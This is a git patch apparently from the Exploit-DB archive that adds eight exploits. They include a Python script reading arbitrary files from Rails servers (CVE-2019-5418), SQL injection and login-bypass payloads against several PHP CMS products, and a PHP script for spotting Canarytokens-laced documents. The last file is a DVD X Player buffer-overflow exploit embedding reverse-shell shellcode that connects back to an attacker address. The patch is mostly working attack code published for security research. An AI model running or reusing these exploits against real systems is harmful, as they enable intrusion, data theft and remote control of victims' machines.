From 34e4bc14d91c54af50507d56a3ee77ebbe7bd8b2 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 22 Mar 2019 05:02:11 +0000
Subject: [PATCH] DB: 2019-03-22

8 changes to exploits/shellcodes

Canarytokens 2019-03-01 - Detection Bypass

DVD X Player 5.5.3 - '.plf' Buffer Overflow
Netartmedia Vlog System - 'email' SQL Injection
Rails 5.2.1 - Arbitrary File Content Disclosure
The Company Business Website CMS - Multiple Vulnerabilities
uHotelBooking System - 'system_page' SQL Injection
Placeto CMS Alpha v4 - 'page' SQL Injection
Bootstrapy CMS - Multiple SQL Injection
---
 exploits/multiple/webapps/46585.py | 73 ++++++++++++++++++++++++++++++
 exploits/php/webapps/46583.txt     | 13 ++++++
 exploits/php/webapps/46586.txt     | 31 +++++++++++++
 exploits/php/webapps/46587.txt     | 17 +++++++
 exploits/php/webapps/46588.txt     | 36 +++++++++++++++
 exploits/php/webapps/46590.txt     | 36 +++++++++++++++
 exploits/windows/dos/46589.php     | 37 +++++++++++++++
 exploits/windows/local/46584.py    | 64 ++++++++++++++++++++++++++
 files_exploits.csv                 |  8 ++++
 9 files changed, 315 insertions(+)
 create mode 100755 exploits/multiple/webapps/46585.py
 create mode 100644 exploits/php/webapps/46583.txt
 create mode 100644 exploits/php/webapps/46586.txt
 create mode 100644 exploits/php/webapps/46587.txt
 create mode 100644 exploits/php/webapps/46588.txt
 create mode 100644 exploits/php/webapps/46590.txt
 create mode 100644 exploits/windows/dos/46589.php
 create mode 100755 exploits/windows/local/46584.py

diff --git a/exploits/multiple/webapps/46585.py b/exploits/multiple/webapps/46585.py
new file mode 100755
index 000000000..b928a7f78
--- /dev/null
+++ b/exploits/multiple/webapps/46585.py
@@ -0,0 +1,73 @@
+'''
+Exploit Title: File Content Disclosure on Rails
+Date: CVE disclosed 3/16 today's date is 3/20
+Exploit Author: NotoriousRebel
+Vendor Homepage: https://rubyonrails.org/
+Software Link: https://github.com/rails/rails
+Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
+Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
+CVE: 2019-5418
+'''
+import sys
+
+try:
+    import requests
+except ImportError:
+    print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
+    sys.exit(1)
+
+
+def banner():
+    banner = """
+    ----------------------------------------------
+    Arbitrary Traversal exploit for Ruby on Rails
+    CVE-2019-5418
+    ----------------------------------------------
+    """
+    print(banner)
+
+def check_args():
+    if len(sys.argv) != 2:
+        print("Invalid number of arguments entered!")
+        how_to_use = "python3 Bandit.py url"
+        print('Use as:', how_to_use)
+        sys.exit(1)
+
+
+def check_url(url):
+    status_code = requests.get(url)
+    if status_code != 200:
+        print("Url is invalid or can not be reached!")
+        sys.exit(1)
+
+
+def read_file(url, file):
+    headers = {'Accept': file + '{{'}
+    req = requests.get(url, headers=headers)
+    return req
+
+
+def main():
+    banner()
+    check_args()
+    url = sys.argv[1]
+    while True:
+        try:
+            file = input("Enter file to read (enter quit to exit): ")
+        except Exception:
+            file = raw_input("Enter file to read (enter quit to exit): ")
+        try:
+            if file.lower() == 'quit':
+                break
+        except Exception:
+            if file == 'quit':
+                break
+        response = read_file(url, file)
+        print(response.text)
+
+
+if __name__ == '__main__':
+    try:
+        main()
+    except KeyboardInterrupt:
+        print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')
\ No newline at end of file
diff --git a/exploits/php/webapps/46583.txt b/exploits/php/webapps/46583.txt
new file mode 100644
index 000000000..e76587994
--- /dev/null
+++ b/exploits/php/webapps/46583.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
+# Date: 20.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
+# Demo Site: https://www.phpscriptdemos.com/vlogs/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+----- PoC: SQLi -----
+# Request: http://localhost/[PATH]/index.php
+# Vulnerable Parameter: email (POST)
+# Attack
+Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password
\ No newline at end of file
diff --git a/exploits/php/webapps/46586.txt b/exploits/php/webapps/46586.txt
new file mode 100644
index 000000000..df0090419
--- /dev/null
+++ b/exploits/php/webapps/46586.txt
@@ -0,0 +1,31 @@
+# Exploit Title: The Company Business Website CMS - 'user_name' SQL
+Injection
+# Date: 20.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
+# Demo Site: http://thecompany.morkocbilisim.com
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/admin/production/login.php
+Vulnerable Parameter: user_name (POST)
+Payload: user_name=VNfn' UNION ALL SELECT
+NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--
+WMfV&user_password=&loggin=Psop
+
+
+# Exploit Title: The Company Business Website CMS - Authentication Bypass
+# Date: 20.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
+# Demo Site: http://thecompany.morkocbilisim.com
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+----- PoC: Authentication Bypass -----
+Administration Panel: http://localhost/[PATH]/admin/production/login.php
+Username: '=' 'or'
+Password: '=' 'or'
\ No newline at end of file
diff --git a/exploits/php/webapps/46587.txt b/exploits/php/webapps/46587.txt
new file mode 100644
index 000000000..1a40dd10a
--- /dev/null
+++ b/exploits/php/webapps/46587.txt
@@ -0,0 +1,17 @@
+# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
+# Date: 21.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.hotel-booking-script.com
+# Demo Site: https://www.hotel-booking-script.com/demo/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+# Description: uHotelBooking is a powerful hotel management and online
+booking/reservation site script.
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/index.php
+Vulnerable Parameter: system_page (GET)
+Attack Pattern:
+http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
\ No newline at end of file
diff --git a/exploits/php/webapps/46588.txt b/exploits/php/webapps/46588.txt
new file mode 100644
index 000000000..9c8861764
--- /dev/null
+++ b/exploits/php/webapps/46588.txt
@@ -0,0 +1,36 @@
+Placeto CMS Alpha v4 - 'page' SQL Injection
+
+# Title: Placeto CMS
+# Date: 21.03.2019
+# Exploit Author: Abdullah Çelebi
+# Vendor Homepage: https://sourceforge.net/projects/placeto/
+# Software Link: https://sourceforge.net/projects/placeto/files/alpha-rv.4/placeto.zip
+# Version: Alpha rv.4
+# Category: Webapps
+# Tested on: WAMPP @Win
+# Software description:
+A lightweight, easy to use PHP content management system (CMS). Written to
+be fast and to use as little memory as possible. Placeto CMS offers browser
+and server caching, provides gzip compression and to cut down on bandwidth
+and CPU time.
+
+# Vulnerabilities:
+# An attacker can access all data following an authorized user login using
+the parameter.
+
+
+# POC - SQLi :
+
+# Parameter: page (GET)
+# Request URL: http://localhost/placeto/admin/edit.php?page=key
+
+#    Type : boolean-based blind
+page=JyI" AND 1647=1647 AND "svwN"="svwN
+
+#    Type : time-based blind
+page=JyI" AND SLEEP(5) AND "uIvY"="uIvY
+
+#    Type : union query
+page=-8388" UNION ALL SELECT
+NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4a6f6972635551635179725550617072647371784f6445576b74736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
+CbSf
\ No newline at end of file
diff --git a/exploits/php/webapps/46590.txt b/exploits/php/webapps/46590.txt
new file mode 100644
index 000000000..687992ea1
--- /dev/null
+++ b/exploits/php/webapps/46590.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Bootstrapy CMS - Multiple SQL Injection
+# Date: 21.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: http://bootstrapy.com
+# Demo Site: http://bootstrapy.net/demo/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/modules/forums/forum-thread.php
+Vulnerable Parameter: thread_id (POST)
+Attack Patten:
+search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/modules/pages/contact-submit.php
+Vulnerable Parameter: subject (POST)
+Attack Pattern:
+email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=
+
+----- PoC 3 - SQLi -----
+
+Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
+Vulnerable Parameter: post-id
+Attack Pattern:
+body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&quote=1&submit=&thread-id=1
+
+----- PoC 4 - SQLi -----
+
+Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
+Vulnerable Parameter: thread-id (POST)
+Attack Pattern:
+quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
\ No newline at end of file
diff --git a/exploits/windows/dos/46589.php b/exploits/windows/dos/46589.php
new file mode 100644
index 000000000..26c6cf174
--- /dev/null
+++ b/exploits/windows/dos/46589.php
@@ -0,0 +1,37 @@
+## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass
+# Date: 20.03.2019
+# Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale 
+# Vendor Homepage: https://thinkst.com/
+# Version: up to 2019-03-01
+# Software Link: https://github.com/thinkst/canarytokens
+# Google Dork: N/A 
+# CVE: 2019-9768 
+#==================================================================================================================================================================================
+# PoC:
+#
+#
+#
+# Requires unzip:
+#
+# sudo apt-get install unzip
+#
+#
+
+
+<?php
+ 
+system('unzip ' . $argv[1] . '.docx');
+ 
+system('cp ' . $argv[1] . '.docx ./docProps/' . $argv[1] . '.docx && cd docProps');
+ 
+$strFile = file_get_contents("docProps/core.xml");
+ 
+if(strpos($strFile, 'AAAAAAAAAAAAAAAA')!=false && strpos($strFile, '2015-07-21')!=false && filesize( $argv[1] .".docx") < 170000 )
+{
+     echo "This file probably contains a CanaryToken! Open it with Libreoffice/Microsoft Word Protected View to bypass detection";
+}
+else
+{
+     echo "Should be safe to open normally";
+}
+?>
\ No newline at end of file
diff --git a/exploits/windows/local/46584.py b/exploits/windows/local/46584.py
new file mode 100755
index 000000000..6914da281
--- /dev/null
+++ b/exploits/windows/local/46584.py
@@ -0,0 +1,64 @@
+#!/usr/bin/env python
+
+# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
+# Date: 20.03.2019
+# Exploit Author: Paolo Perego - paolo@armoredcode.com
+# Vendor Homepage: http://www.dvd-x-player.com
+# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
+# Version: 5.5.3.8 and above
+# Tested on: Windows 7 Professional SP1 x86
+# CVE : CVE-2018-9128
+# Similiar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438 
+#   In Windows 7, SEH handler to be used contains a \x00 byte that it has been
+#   obtained using a restricted char. For such a reason, every jump has to be
+#   backward on the beginning of attacking shellcode.
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\x00\x0a\x1a\x0d' -f py -v shellcode
+
+shellcode = ""
+shellcode += "\xb8\xb8\xfa\xed\xbb\xda\xc1\xd9\x74\x24\xf4\x5a"
+shellcode += "\x33\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x7a"
+shellcode += "\xfe\x0f\x4e\x86\x17\x4d\xb1\x76\xe8\x32\x3b\x93"
+shellcode += "\xd9\x72\x5f\xd0\x4a\x43\x2b\xb4\x66\x28\x79\x2c"
+shellcode += "\xfc\x5c\x56\x43\xb5\xeb\x80\x6a\x46\x47\xf0\xed"
+shellcode += "\xc4\x9a\x25\xcd\xf5\x54\x38\x0c\x31\x88\xb1\x5c"
+shellcode += "\xea\xc6\x64\x70\x9f\x93\xb4\xfb\xd3\x32\xbd\x18"
+shellcode += "\xa3\x35\xec\x8f\xbf\x6f\x2e\x2e\x13\x04\x67\x28"
+shellcode += "\x70\x21\x31\xc3\x42\xdd\xc0\x05\x9b\x1e\x6e\x68"
+shellcode += "\x13\xed\x6e\xad\x94\x0e\x05\xc7\xe6\xb3\x1e\x1c"
+shellcode += "\x94\x6f\xaa\x86\x3e\xfb\x0c\x62\xbe\x28\xca\xe1"
+shellcode += "\xcc\x85\x98\xad\xd0\x18\x4c\xc6\xed\x91\x73\x08"
+shellcode += "\x64\xe1\x57\x8c\x2c\xb1\xf6\x95\x88\x14\x06\xc5"
+shellcode += "\x72\xc8\xa2\x8e\x9f\x1d\xdf\xcd\xf7\xd2\xd2\xed"
+shellcode += "\x07\x7d\x64\x9e\x35\x22\xde\x08\x76\xab\xf8\xcf"
+shellcode += "\x79\x86\xbd\x5f\x84\x29\xbe\x76\x43\x7d\xee\xe0"
+shellcode += "\x62\xfe\x65\xf0\x8b\x2b\x29\xa0\x23\x84\x8a\x10"
+shellcode += "\x84\x74\x63\x7a\x0b\xaa\x93\x85\xc1\xc3\x3e\x7c"
+shellcode += "\x82\x2b\x16\x46\x38\xc4\x65\xb6\xad\x48\xe3\x50"
+shellcode += "\xa7\x60\xa5\xcb\x50\x18\xec\x87\xc1\xe5\x3a\xe2"
+shellcode += "\xc2\x6e\xc9\x13\x8c\x86\xa4\x07\x79\x67\xf3\x75"
+shellcode += "\x2c\x78\x29\x11\xb2\xeb\xb6\xe1\xbd\x17\x61\xb6"
+shellcode += "\xea\xe6\x78\x52\x07\x50\xd3\x40\xda\x04\x1c\xc0"
+shellcode += "\x01\xf5\xa3\xc9\xc4\x41\x80\xd9\x10\x49\x8c\x8d"
+shellcode += "\xcc\x1c\x5a\x7b\xab\xf6\x2c\xd5\x65\xa4\xe6\xb1"
+shellcode += "\xf0\x86\x38\xc7\xfc\xc2\xce\x27\x4c\xbb\x96\x58"
+shellcode += "\x61\x2b\x1f\x21\x9f\xcb\xe0\xf8\x1b\xf5\x11\x30"
+shellcode += "\xb6\x62\x88\xa1\xfb\xee\x2b\x1c\x3f\x17\xa8\x94"
+shellcode += "\xc0\xec\xb0\xdd\xc5\xa9\x76\x0e\xb4\xa2\x12\x30"
+shellcode += "\x6b\xc2\x36"
+
+junk = "\x90" * (600 -len(shellcode))
+junk += shellcode
+
+# nasm > jmp $-400
+# 00000000  E96BFEFFFF        jmp 0xfffffe70
+backflip="\x90\x90\x90\xE9\x6B\xFE\xFF\xFF"
+junk += backflip
+
+# 00401838  |. 5E             POP ESI
+junk += "\xeb\xf6\x90\x90"
+junk += "\x38\x18\x40\x1a"
+
+file = open("evil_playlist.plf", "w")
+file.write(junk)
+file.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 80de45bd2..bc0cbf7ae 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6366,6 +6366,7 @@ id,file,description,date,author,type,platform,port
 46569,exploits/windows/dos/46569.txt,"Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject",2019-03-19,"Google Security Research",dos,windows,
 46570,exploits/multiple/dos/46570.txt,"Google Chrome < M73 - MidiManagerWin Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
 46571,exploits/multiple/dos/46571.txt,"Google Chrome < M73 - FileSystemOperationRunner Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
+46589,exploits/windows/dos/46589.php,"Canarytokens 2019-03-01 - Detection Bypass",2019-03-21,"Gionathan Reale",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10372,6 +10373,7 @@ id,file,description,date,author,type,platform,port
 46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows,
 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,
 46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows,
+46584,exploits/windows/local/46584.py,"DVD X Player 5.5.3 - '.plf' Buffer Overflow",2019-03-21,"Paolo Perego",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41025,3 +41027,9 @@ id,file,description,date,author,type,platform,port
 46580,exploits/hardware/webapps/46580.txt,"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control",2019-03-20,"Kumar Saurav",webapps,hardware,80
 46581,exploits/hardware/webapps/46581.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery",2019-03-20,"Kumar Saurav",webapps,hardware,80
 46582,exploits/php/webapps/46582.txt,"Netartmedia Deals Portal - 'Email' SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46583,exploits/php/webapps/46583.txt,"Netartmedia Vlog System - 'email' SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
+46585,exploits/multiple/webapps/46585.py,"Rails 5.2.1 - Arbitrary File Content Disclosure",2019-03-21,NotoriousRebel,webapps,multiple,
+46586,exploits/php/webapps/46586.txt,"The Company Business Website CMS - Multiple Vulnerabilities",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
+46587,exploits/php/webapps/46587.txt,"uHotelBooking System - 'system_page' SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
+46588,exploits/php/webapps/46588.txt,"Placeto CMS Alpha v4 - 'page' SQL Injection",2019-03-21,"Abdullah Çelebi",webapps,php,80
+46590,exploits/php/webapps/46590.txt,"Bootstrapy CMS - Multiple SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80